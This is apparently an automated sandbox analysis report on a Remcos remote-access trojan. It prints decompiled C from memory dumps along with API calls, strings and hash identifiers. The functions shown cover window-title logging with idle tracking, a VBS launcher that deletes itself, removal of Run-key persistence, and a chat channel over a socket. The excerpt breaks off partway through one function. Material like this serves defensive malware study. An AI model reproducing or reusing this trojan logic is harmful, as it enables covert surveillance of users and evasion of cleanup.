				E10593F14(_t123,  &_v148, E105A8148( &_v76, E105A7F01( &_v28)), 0, _t233, 0x460198);
				E10592D5E();
				E10592E35();
				E10595297(_t123,  &_v124, E10593F14(_t123,  &_v28, E105950ED(_t123,  &_v76, E105CA6ED(_t123,  &_v28, _t233, 0x460008)), 0, _t233, 0x45f948), _t233,  &_v148);
				E10592D5E();
				E10592D5E();
				E10595273(_t123,  &_v52, 0x4601a4, _t233, E105950ED(_t123,  &_v28, 0x460040));
				E10592D5E();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E1059417F(E10593F14(_t124,  &_v28, E10595273(_t124,  &_v76, 0x4601d8, _t234, E105950ED(_t124,  &_v100,  &_v668)), 0, _t234, 0x4601d0));
					E10592D5E();
					E10592D5E();
					E10592D5E();
				}
				E1059417F(E10593F14(_t124,  &_v100, E10593F14(_t124,  &_v28, E105950ED(_t124,  &_v76, 0x460210), 0, _t234,  &_v668), 0, _t234, 0x460208));
				E10592D5E();
				E10592D5E();
				E10592D5E();
				_t235 = _t124;
				if(_t124 != 0) {
					E105984DA(_t124,  &_v52, 0, 0x460234);
				}
				_t82 = E10598352(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E1059417F(E10593F14(0x45f724,  &_v100, E1059ACD7( &_v28, 0x460240, _t236, 0x46c530), 0, _t236, 0x460208));
					E10592D5E();
					E10592D5E();
				}
				E105984DA(0x45f724,  &_v52, 0, 0x460140);
				_t84 = E10592D59( &_v124);
				_t85 = E105932F7();
				if(E105A87B5(E10592D59( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, 0x45f6e4, E10592D59( &_v124), 0x45f724, 0x45f724, 0);
				}
				ExitProcess(0);
			}

0x1059bbfe
0x1059bc0a
0x1059bc0c
0x1059bc0c
0x1059bc14
0x1059bc1a
0x1059bc1c
0x1059bc1c
0x1059bc28
0x1059bc36
0x1059bc36
0x1059bc4b
0x1059bc5c
0x1059bc61
0x1059bc68
0x1059bc79
0x1059bc7e
0x1059bc85
0x1059bc99
0x1059bc9e
0x1059bcaf
0x1059bcbe
0x1059bcc6
0x1059bce7
0x1059bcef
0x1059bcf1
0x1059bcfc
0x1059bcfc
0x1059bd0f
0x1059bd21
0x1059bd26
0x1059bd2c
0x1059bd2e
0x1059bd3d
0x1059bd3d
0x1059bd52
0x1059bd59
0x1059bd72
0x1059bd7b
0x1059bd83
0x1059bdb8
0x1059bdc1
0x1059bdc9
0x1059bde4
0x1059bded
0x1059bdf2
0x1059bdf2
0x1059bdf5
0x1059be29
0x1059be31
0x1059be39
0x1059be41
0x1059be41
0x1059be79
0x1059be81
0x1059be89
0x1059be91
0x1059be96
0x1059be98
0x1059bea2
0x1059bea2
0x1059beb5
0x1059beba
0x1059bebc
0x1059bee1
0x1059bee9
0x1059bef1
0x1059bef1
0x1059befe
0x1059bf07
0x1059bf10
0x1059bf2e
0x1059bf42
0x1059bf42
0x1059bf49

APIs

Part of subcall function 105A0FC9: TerminateProcess.KERNEL32(00000000,?,1059BC03), ref: 105A0FD9
Part of subcall function 105A0FC9: WaitForSingleObject.KERNEL32(000000FF,?,1059BC03), ref: 105A0FEC

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1059BCFC
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1059BD0F

Part of subcall function 1059ABE1: DeleteFileW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABB1
Part of subcall function 1059ABE1: RemoveDirectoryW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABD6
Part of subcall function 1059ABE1: TerminateThread.KERNEL32(0040884B,00000000,?,1059BC11), ref: 1059ABF0
Part of subcall function 1059ABE1: UnhookWindowsHookEx.USER32(0046C350), ref: 1059AC00
Part of subcall function 1059ABE1: TerminateThread.KERNEL32(00408830,00000000,?,1059BC11), ref: 1059AC12

ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,0045F724,0045F724,00000000), ref: 1059BF42
ExitProcess.KERNEL32 ref: 1059BF49

Strings

Remcos, xrefs: 1059BC3B
fso.DeleteFolder ", xrefs: 1059BEC4
while fso.FileExists(", xrefs: 1059BE0C
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 1059BC40
On Error Resume Next, xrefs: 1059BDDC
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 1059BC8F

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Terminate$DeleteFileProcessThread$DirectoryExecuteExitHookModuleNameObjectRemoveShellSingleUnhookWaitWindows
String ID: On Error Resume Next$Remcos$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$fso.DeleteFolder "$while fso.FileExists("
API String ID: 4014257804-1409672675
Opcode ID: 5203026b9e9c351e5864ac0f5871ac187740bbe2731bbf21f0ac6fd14bb0fb7f
Instruction ID: c57f736de2034e813b58f9943e6fa6ba2b6b81f3ffdfcf8da731ca81bdf300e9
Opcode Fuzzy Hash: 5203026b9e9c351e5864ac0f5871ac187740bbe2731bbf21f0ac6fd14bb0fb7f
Instruction Fuzzy Hash: 12819239A002089ADB05EBA0DC9AEFF7F69EF90640F14406EF406671A1FE647D4BC795

Uniqueness

Uniqueness Score: -1.00%

Function 00409195, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409195(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					E00409DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E00402489();
						GetWindowTextW(_t77, E00401EEB( &_v100), _t57);
						_t112 = 0x46dd0c;
						if(E00409EAC(0x46dd0c) == 0) {
							E00409DD2(0x46dd0c,  &_v100);
							E0040733F(E00402489() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x46c39b;
							if( *0x46c39b == 0) {
								_t112 = E00409E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E004030A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								E00408B80(_t119);
								E00401EF0();
							} else {
								E00407350(_t77, _t127, 0x46dd0c, _t136,  &_v108);
								E00409634(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					E00409C15(_t119);
					if(E004171D6(_t119) < 0xea60) {
						L18:
						E00401EF0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E004171D6(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0043BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E00405343(_t77,  &_v80, E004075C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								E004172DA(_t127, _t50);
								E00408B80(_t119);
								E00401FC7();
								E00401FC7();
								E00401FC7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						E00401EF0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}

0x00409195
0x0040919b
0x0040919e
0x0040919f
0x004091a1
0x004091a3
0x00409202
0x0040920e
0x00409211
0x0040921b
0x00409223
0x0040922a
0x00409234
0x00409245
0x0040924b
0x0040925b
0x00409267
0x0040927b
0x00409280
0x00409287
0x0040928e
0x004092b8
0x004092bc
0x004092c4
0x004092cd
0x00409290
0x00409293
0x0040929a
0x0040929a
0x0040928e
0x0040925b
0x004092d2
0x004092d4
0x004092e5
0x0040938d
0x00409391
0x00000000
0x004092eb
0x004092eb
0x004092ef
0x004092ff
0x00409306
0x00409326
0x00409329
0x0040935a
0x0040935f
0x00409362
0x00409366
0x0040936d
0x00409376
0x0040937f
0x00409388
0x00000000
0x00409388
0x00409308
0x0040930f
0x00409313
0x00409313
0x0040939f
0x00000000
0x0040939f
0x004092e5
0x004093a6
0x004093ac

APIs

__Init_thread_footer.LIBCMT ref: 004091F7
Sleep.KERNEL32(000001F4), ref: 00409202
GetForegroundWindow.USER32 ref: 00409208
GetWindowTextLengthW.USER32(00000000), ref: 00409211
GetWindowTextW.USER32 ref: 00409245
Sleep.KERNEL32(000003E8), ref: 00409313

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD

Strings

minutes }, xrefs: 00409339
], xrefs: 004092A7
[ , xrefs: 004092AD
{ User has been idle for , xrefs: 00409345

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
String ID: [ ${ User has been idle for $ ]$ minutes }
API String ID: 107669343-3343415809
Opcode ID: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
Opcode Fuzzy Hash: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B488, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B488(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				E0041015B();
				_t36 = E00402489();
				_t37 = E00401F95(0x46c560);
				_t40 = E00410A30(E00401F95(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E004030A6(_t79,  &_v124, E004172DA( &_v52, E00417093( &_v76)), 0, _t140, L".vbs");
				E00401EF0();
				E00401FC7();
				E00404429(_t79,  &_v100, E004030A6(_t79,  &_v76, E0040427F(_t79,  &_v52, E0043987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				E00401EF0();
				E00401EF0();
				E00401F6D(_t79,  &_v28);
				_t54 = E0040427F(_t79,  &_v196, L"\"\"\", 0");
				E00403311(E004030A6(_t79,  &_v76, E00403030( &_v52, E004030A6(_t79,  &_v148, E0040427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E0040766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = E00401EEB( &_v100);
				_t68 = E00402489();
				if(E00417947(E00401EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EEB( &_v100), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EF0();
				E00401EF0();
				return E00401EF0();
			}

0x0040b488
0x0040b493
0x0040b49f
0x0040b4a7
0x0040b4cb
0x0040b4d5
0x0040b4d7
0x0040b4e2
0x0040b4e2
0x0040b504
0x0040b50d
0x0040b515
0x0040b547
0x0040b550
0x0040b558
0x0040b560
0x0040b575
0x0040b5ba
0x0040b5c2
0x0040b5ca
0x0040b5d5
0x0040b5e0
0x0040b5eb
0x0040b5f8
0x0040b601
0x0040b60a
0x0040b628
0x0040b64d
0x0040b64d
0x0040b656
0x0040b65e
0x0040b670

APIs

Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E

Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
ExitProcess.KERNEL32 ref: 0040B64D

Strings

open, xrefs: 0040B63B
""", 0, xrefs: 0040B56A
.vbs, xrefs: 0040B4E8
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040B5F0
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B582
exepath, xrefs: 0040B4BA
Temp, xrefs: 0040B523

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: cb740de2307435e99b1296b2d4ab56f0759c9049fa38ebb65609f6a5db18dc5a
Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
Opcode Fuzzy Hash: cb740de2307435e99b1296b2d4ab56f0759c9049fa38ebb65609f6a5db18dc5a
Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 105C63F8, Relevance: 16.6, APIs: 11, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E105C63F8(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E105C6375(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E105CB372())) = 0x16;
					E105C77CB();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E105D07FA(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E105D07FA(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E105D22C1(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E105CB33C(GetLastError());
										}
									}
								}
								E105D1063(_t67);
							} else {
								E105CB33C(GetLastError());
							}
						}
						E105D1063(_t64);
					} else {
						E105CB33C(GetLastError());
					}
					goto L18;
				}
			}

0x105c63f8
0x105c6408
0x105c6410
0x105c6412
0x105c6415
0x105c6418
0x105c641d
0x105c6432
0x105c6437
0x105c643d
0x105c650f
0x105c6513
0x105c6518
0x105c6518
0x105c6526
0x105c6526
0x105c641f
0x105c6424
0x00000000
0x00000000
0x105c6426
0x105c642b
0x00000000
0x105c6447
0x105c6450
0x105c6456
0x105c645b
0x105c6478
0x105c647a
0x105c647d
0x105c6498
0x105c64b1
0x105c64b6
0x105c64c6
0x105c64ce
0x105c64d3
0x105c64ec
0x105c64fd
0x105c64ee
0x105c64f5
0x105c64fa
0x105c64ec
0x105c64d3
0x105c6501
0x105c649a
0x105c64a1
0x105c64a1
0x105c6506
0x105c6508
0x105c645d
0x105c6464
0x105c6469
0x00000000
0x105c645b

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C6450
GetLastError.KERNEL32(?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C645D
__dosmaperr.LIBCMT ref: 105C6464
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C6490
GetLastError.KERNEL32(?,?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C649A
__dosmaperr.LIBCMT ref: 105C64A1
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,0045F3F0,00000000,00000000,?,?,?,?,?,?,10592BA7,?), ref: 105C64E4
GetLastError.KERNEL32(?,?,?,?,?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C64EE
__dosmaperr.LIBCMT ref: 105C64F5
_free.LIBCMT ref: 105C6501
_free.LIBCMT ref: 105C6508

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 849a0d04bf410f1f8ab15d7300547c3a5578a558c251933ff8797b2c56f23ee6
Instruction ID: 50f79a3861f4bfad757b3aa55b9e08da3b7bec0e35f148b6833979d99431d741
Opcode Fuzzy Hash: 849a0d04bf410f1f8ab15d7300547c3a5578a558c251933ff8797b2c56f23ee6
Instruction Fuzzy Hash: 5D31927580424ABFDF015FE4CD89A9F3F6CEF496A1F600165F81056290DB31EA11DB71

Uniqueness

Uniqueness Score: -1.00%

Function 0043558A, Relevance: 16.6, APIs: 11, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043558A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E00435507(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E0043A504())) = 0x16;
					E0043695D();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E0043F98C(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E0043F98C(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E00441453(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E0043A4CE(GetLastError());
										}
									}
								}
								E004401F5(_t67);
							} else {
								E0043A4CE(GetLastError());
							}
						}
						E004401F5(_t64);
					} else {
						E0043A4CE(GetLastError());
					}
					goto L18;
				}
			}

0x0043558a
0x0043559a
0x004355a2
0x004355a4
0x004355a7
0x004355aa
0x004355af
0x004355c4
0x004355c9
0x004355cf
0x004356a1
0x004356a5
0x004356aa
0x004356aa
0x004356b8
0x004356b8
0x004355b1
0x004355b6
0x00000000
0x00000000
0x004355b8
0x004355bd
0x00000000
0x004355d9
0x004355e2
0x004355e8
0x004355ed
0x0043560a
0x0043560c
0x0043560f
0x0043562a
0x00435643
0x00435648
0x00435658
0x00435660
0x00435665
0x0043567e
0x0043568f
0x00435680
0x00435687
0x0043568c
0x0043567e
0x00435665
0x00435693
0x0043562c
0x00435633
0x00435633
0x00435698
0x0043569a
0x004355ef
0x004355f6
0x004355fb
0x00000000
0x004355ed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355E2
GetLastError.KERNEL32(?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355EF
__dosmaperr.LIBCMT ref: 004355F6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435622
GetLastError.KERNEL32(?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043562C
__dosmaperr.LIBCMT ref: 00435633
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D39,?), ref: 00435676
GetLastError.KERNEL32(?,?,?,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435680
__dosmaperr.LIBCMT ref: 00435687
_free.LIBCMT ref: 00435693
_free.LIBCMT ref: 0043569A

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: af4fff882a718f2a0465fbb3afeaba3fd683e49890623f651a00384afc978380
Instruction ID: b5d46763a30f5c02a0768ec9d988a2018c1f619f389f5c820b1df77af5e22da9
Opcode Fuzzy Hash: af4fff882a718f2a0465fbb3afeaba3fd683e49890623f651a00384afc978380
Instruction Fuzzy Hash: 9F314A71400A0ABFDF01AFA5CC46DAF7B78EF08365F10416AF91896291DB39CD21CB69

Uniqueness

Uniqueness Score: -1.00%

Function 1059625B, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1059625B(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				signed int _t117;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;

				_t125 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E10592F5A(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
				SetEvent( *(_t69 + 0x34));
				_t28 = E10592E03( &_v108);
				E10595114( &_v108,  &_v60, 4, 0xffffffff);
				_t120 = (_t117 & 0xfffffff8) - 0x5c;
				E10592F5A(_t69, _t120, _t101, _t125, 0x46c238);
				_t121 = _t120 - 0x18;
				E10592F5A(_t69, _t121, _t101, _t125,  &_v76);
				E105A82E6( &_v140, _t101);
				_t122 = _t121 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					E10592CB7( &_v116, _t101, __eflags, 0);
					_t36 = E105932F7();
					E10592E03(E10592CB7( &_v120, _t101, __eflags, 0));
					_t101 = _t36;
					_t113 = E105A0509();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						E10592CE2( &_v116, _t101);
						E10592E35();
						E10592E35();
						__eflags = 0;
						return 0;
					}
					 *0x46baec = E105A079F(_t113, 0x45f690);
					 *0x46bae4 = E105A079F(_t113, 0x45f6a0);
					_t46 = E105A079F(_t113, 0x45f6ac);
					_t123 = _t122 - 0x18;
					 *0x46bae8 = _t46;
					 *0x46bae1 = 1;
					E10592F5A(_t69, _t123, 0x45f6ac, __eflags, 0x46c2b8);
					_push(0x74);
					E10595912(_t69, _t69, 0x45f6ac, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x46bae4(_t115,  &_v140);
					if(__eflags != 0) {
						_t123 = _t123 - 0x18;
						E10592F19(_t69, _t123, 0x45f6ac, __eflags, _v140, _t51);
						_push(0x3b);
						E10595912(_t69, _t69, 0x45f6ac, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t127 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x46baec(E10592E03(E10592CB7( &_v116, _t101, _t127, 0)));
				_t128 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E105950ED(_t69,  &_v80, 0x45f6b8);
				_t101 =  &_v84;
				E105A820A(_t69, _t122 - 0x18,  &_v84);
				_push(0x3b);
				E10595912(_t69, _t69,  &_v84, _t128);
				E10592D5E();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

0x1059625b
0x1059625b
0x10596269
0x10596272
0x1059627a
0x10596284
0x10596298
0x1059629d
0x105962a7
0x105962ac
0x105962b6
0x105962bf
0x105962c4
0x105962c7
0x105962ca
0x10596379
0x10596380
0x10596393
0x10596398
0x105963a1
0x105963a3
0x105963a5
0x1059634e
0x10596352
0x1059635b
0x10596364
0x1059636b
0x10596371
0x10596371
0x105963b8
0x105963c9
0x105963d0
0x105963d5
0x105963d8
0x105963df
0x105963eb
0x105963f0
0x105963f4
0x105963f9
0x10596402
0x10596412
0x10596414
0x10596416
0x10596420
0x10596425
0x10596429
0x10596434
0x10596434
0x00000000
0x10596414
0x105962d0
0x105962d3
0x00000000
0x00000000
0x105962e9
0x105962f0
0x105962f2
0x00000000
0x00000000
0x105962fd
0x10596305
0x1059630b
0x10596310
0x10596314
0x1059631d
0x00000000
0x10596322
0x10596339
0x10596344
0x10596344
0x1059634c
0x00000000
0x00000000
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 1059627A
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1059632A
TranslateMessage.USER32(?), ref: 10596339
DispatchMessageA.USER32(?), ref: 10596344
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 105963FC
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 10596434

Part of subcall function 10595912: send.WS2_32(?,00000000,00000000,00000000), ref: 10595986

Strings

DisplayMessage, xrefs: 105963A7
GetMessage, xrefs: 105963B3
CloseChat, xrefs: 105963C4

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: ac4b965a3e5c8c83acfcbb71ef94e7850c6652e83b6f7e3158117b90bf42ec15
Instruction ID: 1f382abc42fdf3881bac4205ed5a664fe3ebf5898ea7114ec5691bf6ed648b68
Opcode Fuzzy Hash: ac4b965a3e5c8c83acfcbb71ef94e7850c6652e83b6f7e3158117b90bf42ec15
Instruction Fuzzy Hash: 4A41803A604301ABCB04EB74DC5A96F7FA8EBC5751F40092DF94293191EF34EA1AC796

Uniqueness

Uniqueness Score: -1.00%

Function 004053ED, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004053ED(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
